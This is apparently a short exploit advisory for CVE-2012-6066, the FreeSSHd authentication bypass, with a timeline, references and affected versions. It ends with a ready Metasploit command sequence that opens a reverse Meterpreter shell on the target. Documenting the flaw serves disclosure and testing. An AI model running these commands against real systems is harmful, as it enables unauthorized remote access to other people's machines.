Timeline :
Vulnerability initially discovered by Aris the 2010-08-11
PoC provided by kcope the 2012-12-01
Metasploit PoC provided the 2013-01-13
PoC provided by :
kcope
Aris
Daniele Martini
Reference(s) :
CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010
Affected version(s) :
Freesshd version 1.2.6 and prior
Tested on Windows XP SP3 with :
Freesshd 1.2.4
Description :
This module exploits a vulnerability found in FreeSSHd 1.2.6 or previous to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
Commands :
use auxiliary/scanner/ssh/ssh_version set RHOSTS 192.168.178.22 run use exploit/windows/ssh/freesshd_authbypass set RHOST 192.168.178.22 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo